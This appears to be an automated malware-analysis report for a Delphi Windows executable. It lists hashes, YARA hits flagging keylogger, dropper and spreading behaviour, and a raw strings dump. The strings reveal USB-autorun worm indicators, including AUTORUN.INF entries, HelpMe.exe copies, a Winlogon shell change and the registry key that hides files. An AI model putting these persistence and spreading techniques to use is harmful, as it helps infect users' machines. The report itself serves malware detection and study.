Sample details: 02b67c1e15dee0401403c999080321c4

Hashes
MD5: 02b67c1e15dee0401403c999080321c4
SHA1: 9740b5270f8cdf9d30cb881dc347a07da3300690
SHA256: f15adea615dec619dbbb1d7675fc7e56dfe244bd0b5c431b7613fd18dbdcbe55
SSDEEP: 24576:TEtl9mRda1cSGB2uJ2s4otqFCJrW9FqvSbqsHasgXhFHDAGtlRXZ+CP63n0NuJvD:oEs1hN
Details
File Type: PE32
Yara Hits
YRP/Borland_Delphi_40_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Borland_Delphi_30_additional | YRP/Borland_Delphi_30_ | YRP/Borland_Delphi_Setup_Module | YRP/Borland_Delphi_40 | YRP/Borland_Delphi_v40_v50 | YRP/BobSoft_Mini_Delphi_BoB_BobSoft_additional | YRP/Borland_Delphi_v60_v70 | YRP/Borland_Delphi_v30 | YRP/Borland_Delphi_DLL | YRP/Borland | YRP/BobSoftMiniDelphiBoBBobSoft | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/borland_delphi | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Browsers | YRP/Dropper_Strings | YRP/SEH__vba | YRP/anti_dbg | YRP/network_dropper | YRP/screenshot | YRP/keylogger | YRP/spreading_file | YRP/win_mutex | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/Big_Numbers3 | YRP/Delphi_FormShow | YRP/Delphi_CompareCall | YRP/Delphi_Copy | YRP/Delphi_StrToInt | YRP/Delphi_DecodeDate | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/suspicious_packer_section | YRP/CAP_HookExKeylogger |
Strings
		This program must be run under Win32
[AspackDie!]
.idata
.rdata
.reloc
.aspack
.adata
Boolean
Integer
Cardinal
String
WideString
TObject
TObject
System
IInterface
System
TInterfacedObject
YZ]_^[
YZ]_^[
_^[YY]
YZ]_^[
C<"u1S
Q<"u8S
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
YZXtm1
ZTUWVSPRTj
tVSVWU
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
odSelected
odGrayed
odDisabled	odChecked	odFocused	odDefault
odHotLight
odInactive	odNoAccel
odNoFocusRect
odReserved1
odReserved2
odComboBoxEdit
Windows
TOwnerDrawState
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
	TFileName
TSearchRecX
	Exception
EHeapException
EOutOfMemory
EInOutError
	EExternal
EExternalException
	EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide,x@
	EOverflow
EUnderflow
EInvalidPointer8y@
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
	EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
_^[YY]
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
	TErrorRec
TExceptRec
YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
(Z]_^[
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgErrorp
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError8
EVariantDispatchError
_^[YY]
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array 
ByRef 
Variants
_^[YY]
_^[YY]
tagEXCEPINFO 
TAlignment
taLeftJustify
taRightJustify
taCenter
Classes
	TBiDiMode
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
Classes
ssShift
ssCtrl
ssLeft
ssRight
ssMiddle
ssDouble
Classes
TShiftState
THelpContext
	THelpType
	htKeyword	htContext
Classes
	TShortCut
TNotifyEvent
Sender
TObject
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerError8OA
EReadError
EWriteError
EClassNotFound
EResNotFound
EListError
EBitsError
EStringListError
EComponentError
EOutOfResourceshRA
EInvalidOperation
TThreadList
TPersistent
TPersistent
Classes
TInterfacedPersistent
TInterfacedPersistent
Classes
IStringsAdapter$
Classes
TStrings
TStrings
Classes
TStringItem
TStringList
TStringList
Classes
TStreamlXA
THandleStream
TFileStreamXYA
TCustomMemoryStream
TMemoryStream
TResourceStream
TStreamAdapter
TClassFinder
TFiler
TReader
EThread
TThread
TComponentName0^A
IDesignerNotify$
Classes
TComponent
TComponentX_A
Classes
TBasicActionLink
TBasicAction
TBasicAction8aA
Classes
TIdentMapEntry
	TRegGroup
TRegGroups
YZ]_^[
$Z]_^[
$Z]_^[
_^[YY]
	TIntConst
_^[YY]
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
TPropFixup
TPropIntfFixup
_^[YY]
_^[YY]
Classes
_^[YY]
_^[YY]
QQQQQQQS
, <!@@M(n 
f8=<YOUT 
"ON 2.RO
  H   
/- B-/IN
KERNEL
re_sub_for
s_enab*0
!bqed">
0aDHell
6ource%
 r-cong
1m_cond
*re-inj
)obal_a
gGlobah
7mation
&alize
g:"Loc
evaria
gpopup
,alizi
*pups 
)izing
0ps_in
?ed":"
eIniti
g,"sin
5up_la
-eme_i
 me ID
$bel_m
&all":
! Call
'el_me
7gs":"
eArgum
i"labe
5_sett
gSetti
)abel_
7s":"T
6","la
*kies"
,es","
!elay"
<:","l
*nditi
ondit<
	dp>\/((
ym)12L5
	.:bal
_hiwab
	d_qni
_<"~in
_`ui-1G7
mlwe,Vw
-128`CH
ls3MP*
'WXfa:
ls3MP3
ggert[
itio8>
zf`lse,"theme_
d":106w
3ire":"med
3ponsive_min_width_unit":" 
b,.res
.siC%_aT8_g\$t|j5naAb:rB8"@
I(dPVc:z
u0HFc,V]4sTQ,_
{"CX/tqOat}$aYQ
p"+05-
%"(3!nimi"
p","animation_origin":"center 
0" "ovu	,ayj:ibQ%x2
Jb:4toXKPXWMpWTMN
delay":"0","theme_slug":"cutt-
'-idge2Wbid
v,2F,us
z"bZms1U!rNOl"
G--$wnUPS
zfalse,"disable_on_tablet":fal
l"oust
he\'hxj!udZb:rT,sm
bs3@/l
m#o{13
-_trigger":false,"position_fixi
b:jalsuWbovP2lmL
dyF!bxP$"2S!l#Wl"
S"lrgl
/n":false,"close_on_overlay_cl
+"6falc
l"cY/sij/nOP3cKE2e{Fb:6S,s	
]3eH*8>
,e_form_reopen":false,"disable
#cissir
,itLb:jT,su
bt|P-eW\$"j
H%"/g%
)dth_unit":"px","responsive_ma@
7ihth_e
l"s@3t{X
waQ4hr
CCn\[[
.":"center top","position_top"
q0<","q
)maA)obj4y`Pb:6S!dm
l"1\)m
m3p} 2CHKR[Dc^P
bcenter top","overlay_zindex":*
y95999)Bx",
:ibQ%x2
m"u`19
7MNk]R@g
'":"cutting-edge","id":1284,"s
'"6"sy}
.-s@4hiG,a~Qb}8
tablet":false,"custom_height_
4o.:fa|
%,"F#rcY,arY%_wZ.tm[4"jT!l
]3ic,9
0osition_fixed":false,"overlayg
)smbletYzfaY3e 
3tqV+avY%"2S!l#Wl"
^%_g &
jileH:
ustRh_j
^coC|el
-"pBxiv
_^[Y_]
Olx$co
n]h$XA
Eu<E4&
-&pGjd
8t=,#xh
XY]H]&
bAYm?D}
<7YG<X[C,
+K'lQDEuttBl
	{<t+(
(kttIn
ttLsO9 
>[P6tr
8c)||3
?]q0I*
=Wq:aOZ
Q_^[HPF$
lIq_^[C
j,->+;
3C\T0Ct
|,9@uY
<$d22GC0<C
;W2n	^s2
.rland\Delphi\Locales
_^[YY]
;IA@$Qgg
W$t?'s
odInactive	odNoAccel
4sFect
$ReF%rzP$1
Z$RqF%r~P$2^]$C
9Em=&b0.
TOwnerDrawState
t?wf,A
E$Y#Eu
4a~|,^
E|^w@3
+(1)HPM
Y]CzQ5$
rUtiBs
l2@F9_
Y/v=E1na|5cd
de0p4$
{v'cR)l@
Et:ROC
<m<!*h
$^u)Sh
uDM$v@
yYYYd	m
Xj98u`pvE
_^[YY]
vN1S]I
paLc)z4
	0tQX 
*v=@.a
0dOeeM&
;<P48R
c!+B&|
@drtzv
a@LPjUcr-;/
Yu8{P!
RhJ'R'
~/dYY]
LY^^[H
Fxu9+-
gJN3sD
tSk|ka
c$G)t-
a)Pt'@
C(Amu/
_^[YY]
_^[YY]
YZ]_^[
YZ]_^[
YZ]_^[
YZ]_^[
S8_^[]
t9;wlt4
FLVhp/D
t$;C8u
QQQQSVW
t#;^dt
BP_^[]
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
TContainedAction
TContainedAction
ActnList
Category
TCustomActionList$DD
TCustomActionList
ActnList
TShortCutList
TShortCutList
ActnList
TCustomAction
TCustomAction
ActnList
TActionLinkSV
u*;~8u
R0Z_^[
;Blu	3
$:Cjt_
R0Z_^[
R0]_^[
$;Ctt?
R0Z_^[
R0Z_^[
R0Z_^[
R0Z_^[
R0]_^[
$Z]_^[
TChangeLinkDUD
TImageIndex
TCustomImageList
TCustomImageList
ImgList
S0_^[]
R ;C0|
R,;C4}!
S`]_^[
Bitmap
comctl32.dll
comctl32.dll
ImageList_WriteEx
EMenuError
TMenuBreak
mbNone
mbBreak
mbBarBreak
TMenuChangeEvent
Sender
TObject
Source	TMenuItem
Rebuild
Boolean
TMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
Selected
Boolean
TAdvancedMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
TOwnerDrawState
TMenuMeasureItemEvent
Sender
TObject
ACanvas
TCanvas
Integer
Height
Integer
TMenuItemAutoFlag
maAutomatic
maManual
maParent
MenusTnD
TMenuAutoFlag
TMenuActionLink
	TMenuItem8pD
	TMenuItem
Action
	AutoCheck
AutoHotkeys
AutoLineReduction8
Bitmap
Caption
Checked
SubMenuImages
Default
EnabledT
GroupIndex
HelpContext
Hint@UD
ImageIndex
	RadioItem
ShortCut
Visible
OnClick
OnDrawItem mD
OnAdvancedDrawItem
OnMeasureItem
TMenu,tD
	TMainMenu
	TMainMenu
AutoHotkeysPnD
AutoLineReduction
	AutoMerge
BiDiMode
Images
	OwnerDraw
ParentBiDiMode\lD
OnChange
TPopupAlignment
paLeft
paRight
paCenter
TTrackButton
tbRightButton
tbLeftButton
TMenuAnimations
maLeftToRight
maRightToLeft
maTopToBottom
maBottomToTop
maNone
TMenuAnimation
TPopupMenu
TPopupMenu
	AlignmentPnD
AutoHotkeysPnD
AutoLineReduction
	AutoPopup
BiDiMode
HelpContext
Images0wD
MenuAnimation
	OwnerDraw
ParentBiDiMode
TrackButton\lD
OnChange
OnPopup
TPopupList
TMenuItemStack
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
_^[YY]
Q<]_^[
ShortCutText
P?:S?u
Q<]_^[
@?:F?v
Q<]_^[
;~hu	3
$YZ]_^[
_^[YY]
Ih;J4u
YZ]_^[
TScrollBarInc
TScrollBarStyle
	ssRegular
ssFlat
ssHotTrack
TControlScrollBar
TControlScrollBar
ButtonSize
	Incrementh
Margin
ParentColor<
Position<
Smooth<
Style<
	ThumbSize
Tracking
Visible
TWindowState
wsNormal
wsMinimized
wsMaximized
TScrollingWinControl
TScrollingWinControlH
HorzScrollBar
VertScrollBar
TFormBorderStyle
bsNone
bsSingle
bsSizeable
bsDialog
bsToolWindow
bsSizeToolWin
Forms@
TBorderStyle
IDesignerHook,^A
Forms	
IOleForm$
TFormStyle
fsNormal
fsMDIChild	fsMDIForm
fsStayOnTop
TBorderIcon
biSystemMenu
biMinimize
biMaximize
biHelp
TBorderIcons
	TPosition
poDesigned	poDefault
poDefaultPosOnly
poDefaultSizeOnly
poScreenCenter
poDesktopCenter
poMainFormCenter
poOwnerFormCenter
Forms 
TDefaultMonitor
	dmDesktop	dmPrimary
dmMainForm
dmActiveForm
Formst
TPrintScale
poNone
poProportional
poPrintToFit
TCloseAction
caNone
caHide
caFree
caMinimize
TCloseEvent
Sender
TObject
Action
TCloseAction
TCloseQueryEvent
Sender
TObject
CanClose
Boolean
TShortCutEvent
TWMKey
Handled
Boolean
THelpEvent
Command
Integer
CallHelp
Boolean
Boolean
TCustomForm
TCustomForml
TFormp
FormsU
Action
ActiveControl<7C
AlphaBlendT
AlphaBlendValued>C
Anchors
AutoScroll
AutoSize
BiDiModeh
BorderIcons
BorderStyle
BorderWidth
Caption<
ClientHeight<
ClientWidth
TransparentColor
TransparentColorValue
Constraints
UseDockManager
DefaultMonitor
DockSite
DragKind8=C
DragMode
Enabled
ParentFontP
	FormStyle<
Height
HelpFile
HorzScrollBarp
KeyPreview
OldCreateOrder4pD
ObjectMenuItem
ParentBiDiMode<
PixelsPerInch
	PopupMenu
Positionp
PrintScale
Scaled
ScreenSnap
ShowHint<
SnapBuffer
VertScrollBar
Visible<
WindowState4pD
WindowMenu
OnActivate
OnCanResize
OnClick
OnCloseD
OnCloseQuerydEC
OnConstrainedResize
OnContextPopup
OnCreate
OnDblClick
	OnDestroy
OnDeactivate
OnDockDrop CC
OnDockOver
OnDragDrop,AC
OnDragOver\BC
	OnEndDockhDC
OnGetSiteInfo
OnHide
OnHelp
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnMouseWheel|FC
OnMouseWheelDown|FC
OnMouseWheelUp
OnPaint
OnResize
OnShortCut
OnShow
OnStartDock
OnUnDock
TCustomDockFormP
TCustomDockForm
PixelsPerInch
TMonitor
TScreen
TScreen@
	THintInfo@
TApplication
TApplication
;X0t@S
+WH+W@
PixelsPerInch
TextHeight
IgnoreFontProperty
_^[YY]
S,_^[]
$Z]_^[
F(Z_^[
MDICLIENT
_^[YY]
_^[YY]
_^[YY]
Ch;Ctt
Cd;Cpt
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
f;sDtsf
CHYZ]_^[
_^[YY]
TApplication
MAINICON
XD;PHu
sx;P`u
;B0uGj
_^[YY]
vcltest3.dll
RegisterAutomation
$Z]_^[
~D_^[Y]
Y_^[Y]
YZ]_^[
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
kernel32.dll
CreateToolhelp32Snapshot
Heap32ListFirst
Heap32ListNext
Heap32First
Heap32Next
Toolhelp32ReadProcessMemory
Process32First
Process32Next
Process32FirstW
Process32NextW
Thread32First
Thread32Next
Module32First
Module32Next
Module32FirstW
Module32NextW
	EOleError
EOleSysError
EOleException
Apartment
Neutral
ole32.dll
CoCreateInstanceEx
CoInitializeEx
CoAddRefServerProcess
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
QQQQQQQQSV
O'LNK'!
ntdll.dll
RtlInitUnicodeString
ZwOpenSection
CURRENT_USER
ThreadTimerT
ThreadLoopFile
FormCreate
	tmr1Timer
	TFrm_Main
	TFrm_Main
Un_Main
SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon
Explorer.exe  HelpMe.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue
\Soft.lnk
Stone,I hate you!
:\AutoRun.exe
:\AUTORUN.INF
AutoRun.exe
autorun
shell\1
shell\1\Command
Browser
shell\2\
shell\2\Command
shellexecute
HelpMe.exe
\HelpMe.exe
QQQQQQQSVW3
:\HelpMe.exe
:\AUTORUN.INF
HelpMe.exe
autorun
shell\1
shell\1\Command
Browser
shell\2\
shell\2\Command
shellexecute
Your disk is removed!
_^[YY]
\HelpMe.exe
\notepad.exe
Internet Explorer\iexplore.exe
Outlook Express\msimn.exe
qr333333333333333
33333333?333333
giW(39
383?35
333838
KRWb8`VA
33o3q333
2q3?33
32q323
[1q3!38
s@`"$33
&'q308
*7q:'$
7q38"$
:"$G6q3
Y35333
733868
333333
33338H
33333333
3 33wx
3533wx
1333f3332333?
233>fC333333
>1C233
fDFfC338
33>ffffc338
fff3;33
4DF334DC33
3;3*C03
3*C333
33338?383
F"F333383
"$a323
33;3<3;
CjC338
D*C'3383
C3s333833?23
3353330
4334IC33233348?303
C3333332
L36!<33
33333333
As3/Cs3WCs3
$Wqr3/qr
}33dr3
bC'qr3
v3gKb$
{"Oqr3_As8+fA
cc*r@c$
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
nEld2Ad
e&rct+c
calSection
VirtualFree
VirtuazALlBc 
jeTC1r
wi0e"h
r8o(uLt
rZE6Ao
e(igr#r
Ci)d1l
@x&t<r
e1hve5de
;rmt"F
pwi=n#i
RtlUnwind
RaiseException
dLa"d	ef
sgrf2^dilR
d tqi*g$
Ke s	g
Fh"r:e
Jdra1i_2ZdGl 
lEa<tP2Ad
Avl;c6t
ALlHc%
2Ld	li
eqK!y*x"
l^2KdIlE
t#orSingleObject
VirtualQuery
O`FOl$
LkcGl$
?e~F'lCP
 evu>e$h
dEi)en
MultiByteToWideChar
MulDiv
VoeQO4F
!ehv(C
l&nio*kc
5ldb(l(r
epegt6me
DlIb/l.lno,
GlobalAddAtomA
GetVersionExA
e0T!rEa'L
SJo1t1a
l1izeS
oUr$er
lAcKe*D
cRe e*tI
dde9tfi
#iLe=i
Cn6m"a
r%nbog
eqCTi:i
aiSCc<i
BeJe7e*i
DeleteCriticalSection
CreateThrexdB
e6iLe(
*o	pvr,S
>eTR=PW
 eTD'B,o
4efB"M
4e	eCt#a
re*t;i
yl'y$n
(a?k+l
"eTD>B
geSDfO
GetBrushOrgEx
GetBitmapBits
7eLe\eaCd
'rLaie
e7Ibi\mDpd
$aIt?e
e.iud)wa
nTltt7M
PxpPp>e@uS
=hOw!w
Tsm5rr
RAnBes
WSnDoR
7eTC0r
!eNCLiUb
aRdlaQad
SetClassLongA
SetCapture
SenA t
r.l$s0Ah
?t'n;e
4eEkieVs
f)s1tre
gzB$eP
)aPVLr
d8e\b#a
?i	l'iMeZ
tVe-u(t
nFoYTHr@a
WInFoRR
S]sSeJM@n
GetMenuState
GetMenuItemInfoA
#ewL5s
geSD@s
GetCursorPos
GetCursoq
dGa;ac
Oe2C	a
>eqC,p
?rem/R
Bi$d"i
7qra#R
m%ifd!w
dWindows
EndPaint
EnableWindow
w:eXt'
w;c	n$xc
M7I0hIl
e#eNum
e,cOn'
0lHsKCLiUb
ca/l!e
t-oUkex%
lejidPDi
BUf)AS
-hAr3p
r:oLe+Ae
t%imd.w"e
8cwi<a
e%ezb%a
d ayout
kernel32.dll
oleaut
lP2Ed	ld
_6eAdv
g@LGsL_<rHgGoSes
_0rAg3n
,mAgMLLs
_reEoSes
L@sT_;e
gELAsQ_2dM
Lys=_*e
hql%3\.
:H#eTS
/D9A$I
2]D9Lp
s,n%cLAv
HelpMe
'KillandHide
(ShlObj
System
SysInit
KWindows
UTypes
sActiveX
3Messages
CommCtrl
*ShellAPI
RegStr
?WinInet
UrlMon
FComObj
qComConst
CVariants
SysConst
$VarUtils
SysUtils
Dialogs
ExtCtrls
Consts
5Themes
nComCtrls
Printers
WWinSpool
^Classes
"RTLConsts
QTypInfo
+Graphics
FlatSB
StdActns
Clipbrd
YStrUtils
&Controls
MultiMon
vMenus
Contnrs
ImgList
EActnList
dStdCtrls
WinHelpViewer
RHelpIntfs
ComStrs
ExtActns
ExtDlgs
3CommDlg
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
AAccCtrl
AclAPI
TlHelp32
Un_Main
TPF0	TFrm_Main
Frm_Main
AlphaBlend	
AlphaBlendValue
BorderIcons
BorderStyle
bsNone
ClientHeight
ClientWidth
	clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
	Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
Position
poScreenCenter
OnCreate
FormCreate
PixelsPerInch
TextHeight
Height
TabOrder
TTimer
Interval
OnTimer
	tmr1Timer
VirtualAlloc
VirtualFree
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
 (08@P`p
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
user32.dll
advapi32.dll
oleaut32.dll
advapi32.dll
version.dll
gdi32.dll
user32.dll
oleaut32.dll
ole32.dll
oleaut32.dll
comctl32.dll
shell32.dll
advapi32.dll
GetKeyboardType
RegQueryValueExA
SysFreeString
RegSetValueExA
VerQueryValueA
UnrealizeObject
CreateWindowExA
SafeArrayPtrOfIndex
OleUninitialize
GetErrorInfo
ImageList_SetIconSize
SHGetSpecialFolderLocation
SetSecurityInfo
Microsoft at Work~.feed-ms
# NOTE: Derived from ../../lib/POSIX.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package POSIX;
#line 642 "../../lib/POSIX.pm (autosplit into ../../lib/auto/POSIX/execv.al)"
sub execv {
    unimpl "execv() is C-specific, stopped";
# end of POSIX::execv
execv.al
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
D$ Pj@
;T$|sF
L$LQWS
u._^]3
u=_^][
T$0WSQUR
f	U4_^][
L$0WSRUQ
f	M4_^][
f	U4_^]
33333333333333
3333333
 !"#$%&'33()3333*333+33,-./0312
@Ww@t,
HHtXHHt
?If90t
uTVWhD
j@j ^V
< tK<	tG
v	N+D$
HHtYHHt
^SSSSS
URPQQh`
t"SS9] u
;t$,v-
UQPXY]Y[
PPPPPPPP
PPPPPPPP
PostTrampSize %d
YWORD 
DQWORD 
TBYTE 
QWORD 
DWORD 
 ;NOT TAKEN
 ;TAKEN
REPNZ 
UNDEFINED
CALL FAR
LOOPNZ
JMP FAR
SYSCALL
SYSRET
WBINVD
SYSENTER
SYSEXIT
GETSEC
CMOVNO
CMOVAE
CMOVNZ
CMOVBE
CMOVNS
CMOVNP
CMOVGE
CMOVLE
CMPXCHG
MOVNTI
INVLPG
VMCALL
VMLAUNCH
VMRESUME
VMXOFF
MONITOR
XGETBV
XSETBV
VMMCALL
VMLOAD
VMSAVE
SKINIT
INVLPGA
SWAPGS
RDTSCP
PREFETCH
PREFETCHW
PFNACC
PFPNACC
PFCMPGE
PFRSQRT
PFCMPGT
PFRCPIT1
PFRSQIT1
PFSUBR
PFCMPEQ
PFRCPIT2
PMULHRW
PSWAPD
PAVGUSB
MOVUPS
MOVUPD
VMOVSS
VMOVSD
VMOVUPS
VMOVUPD
MOVHLPS
MOVLPS
MOVLPD
MOVSLDUP
MOVDDUP
VMOVHLPS
VMOVLPS
VMOVLPD
VMOVSLDUP
VMOVDDUP
UNPCKLPS
UNPCKLPD
VUNPCKLPS
VUNPCKLPD
UNPCKHPS
UNPCKHPD
VUNPCKHPS
VUNPCKHPD
MOVLHPS
MOVHPS
MOVHPD
MOVSHDUP
VMOVLHPS
VMOVHPS
VMOVHPD
VMOVSHDUP
PREFETCHNTA
PREFETCHT0
PREFETCHT1
PREFETCHT2
MOVAPS
MOVAPD
VMOVAPS
VMOVAPD
CVTPI2PS
CVTPI2PD
CVTSI2SS
CVTSI2SD
VCVTSI2SS
VCVTSI2SD
MOVNTPS
MOVNTPD
MOVNTSS
MOVNTSD
VMOVNTPS
VMOVNTPD
CVTTPS2PI
CVTTPD2PI
CVTTSS2SI
CVTTSD2SI
VCVTTSS2SI
VCVTTSD2SI
CVTPS2PI
CVTPD2PI
CVTSS2SI
CVTSD2SI
VCVTSS2SI
VCVTSD2SI
UCOMISS
UCOMISD
VUCOMISS
VUCOMISD
COMISS
COMISD
VCOMISS
VCOMISD
PSHUFB
VPSHUFB
PHADDW
VPHADDW
PHADDD
VPHADDD
PHADDSW
VPHADDSW
PMADDUBSW
VPMADDUBSW
PHSUBW
VPHSUBW
PHSUBD
VPHSUBD
PHSUBSW
VPHSUBSW
PSIGNB
VPSIGNB
PSIGNW
VPSIGNW
PSIGND
VPSIGND
PMULHRSW
VPMULHRSW
VPERMILPS
VPERMILPD
VPTESTPS
VPTESTPD
PBLENDVB
BLENDVPS
BLENDVPD
VPTEST
VBROADCASTSS
VBROADCASTSD
VBROADCASTF128
VPABSB
VPABSW
VPABSD
PMOVSXBW
VPMOVSXBW
PMOVSXBD
VPMOVSXBD
PMOVSXBQ
VPMOVSXBQ
PMOVSXWD
VPMOVSXWD
PMOVSXWQ
VPMOVSXWQ
PMOVSXDQ
VPMOVSXDQ
PMULDQ
VPMULDQ
PCMPEQQ
VPCMPEQQ
MOVNTDQA
VMOVNTDQA
PACKUSDW
VPACKUSDW
VMASKMOVPS
VMASKMOVPD
PMOVZXBW
VPMOVZXBW
PMOVZXBD
VPMOVZXBD
PMOVZXBQ
VPMOVZXBQ
PMOVZXWD
VPMOVZXWD
PMOVZXWQ
VPMOVZXWQ
PMOVZXDQ
VPMOVZXDQ
PCMPGTQ
VPCMPGTQ
PMINSB
VPMINSB
PMINSD
VPMINSD
PMINUW
VPMINUW
PMINUD
VPMINUD
PMAXSB
VPMAXSB
PMAXSD
VPMAXSD
PMAXUW
VPMAXUW
PMAXUD
VPMAXUD
PMULLD
VPMULLD
PHMINPOSUW
VPHMINPOSUW
INVEPT
INVVPID
VFMADDSUB132PS
VFMADDSUB132PD
VFMSUBADD132PS
VFMSUBADD132PD
VFMADD132PS
VFMADD132PD
VFMADD132SS
VFMADD132SD
VFMSUB132PS
VFMSUB132PD
VFMSUB132SS
VFMSUB132SD
VFNMADD132PS
VFNMADD132PD
VFNMADD132SS
VFNMADD132SD
VFNMSUB132PS
VFNMSUB132PD
VFNMSUB132SS
VFNMSUB132SD
VFMADDSUB213PS
VFMADDSUB213PD
VFMSUBADD213PS
VFMSUBADD213PD
VFMADD213PS
VFMADD213PD
VFMADD213SS
VFMADD213SD
VFMSUB213PS
VFMSUB213PD
VFMSUB213SS
VFMSUB213SD
VFNMADD213PS
VFNMADD213PD
VFNMADD213SS
VFNMADD213SD
VFNMSUB213PS
VFNMSUB213PD
VFNMSUB213SS
VFNMSUB213SD
VFMADDSUB231PS
VFMADDSUB231PD
VFMSUBADD231PS
VFMSUBADD231PD
VFMADD231PS
VFMADD231PD
VFMADD231SS
VFMADD231SD
VFMSUB231PS
VFMSUB231PD
VFMSUB231SS
VFMSUB231SD
VFNMADD231PS
VFNMADD231PD
VFNMADD231SS
VFNMADD231SD
VFNMSUB231PS
VFNMSUB231PD
VFNMSUB231SS
VFNMSUB231SD
AESIMC
VAESIMC
AESENC
VAESENC
AESENCLAST
VAESENCLAST
AESDEC
VAESDEC
AESDECLAST
VAESDECLAST
VPERM2F128
ROUNDPS
VROUNDPS
ROUNDPD
VROUNDPD
ROUNDSS
VROUNDSS
ROUNDSD
VROUNDSD
BLENDPS
VBLENDPS
BLENDPD
VBLENDPD
PBLENDW
VPBLENDVW
PALIGNR
VPALIGNR
PEXTRB
VPEXTRB
PEXTRW
VPEXTRW
PEXTRD
PEXTRQ
VPEXTRD
EXTRACTPS
VEXTRACTPS
VINSERTF128
VEXTRACTF128
PINSRB
VPINSRB
INSERTPS
VINSERTPS
PINSRD
PINSRQ
VPINSRD
VPINSRQ
MPSADBW
VMPSADBW
PCLMULQDQ
VPCLMULQDQ
VBLENDVPS
VBLENDVPD
VPBLENDVB
PCMPESTRM
VPCMPESTRM
PCMPESTRI
VCMPESTRI
PCMPISTRM
VPCMPISTRM
PCMPISTRI
VPCMPISTRI
AESKEYGENASSIST
VAESKEYGENASSIST
MOVMSKPS
MOVMSKPD
VMOVMSKPS
VMOVMSKPD
SQRTPS
SQRTPD
SQRTSS
SQRTSD
VSQRTSS
VSQRTSD
VSQRTPS
VSQRTPD
RSQRTPS
RSQRTSS
VRSQRTSS
VRSQRTPS
VRCPSS
VRCPPS
VANDPS
VANDPD
ANDNPS
ANDNPD
VANDNPS
VANDNPD
VXORPS
VXORPD
VADDPS
VADDPD
VADDSS
VADDSD
VMULPS
VMULPD
VMULSS
VMULSD
CVTPS2PD
CVTPD2PS
CVTSS2SD
CVTSD2SS
VCVTSS2SD
VCVTSD2SS
VCVTPS2PD
VCVTPD2PS
CVTDQ2PS
CVTPS2DQ
CVTTPS2DQ
VCVTDQ2PS
VCVTPS2DQ
VCVTTPS2DQ
VSUBPS
VSUBPD
VSUBSS
VSUBSD
VMINPS
VMINPD
VMINSS
VMINSD
VDIVPS
VDIVPD
VDIVSS
VDIVSD
VMAXPS
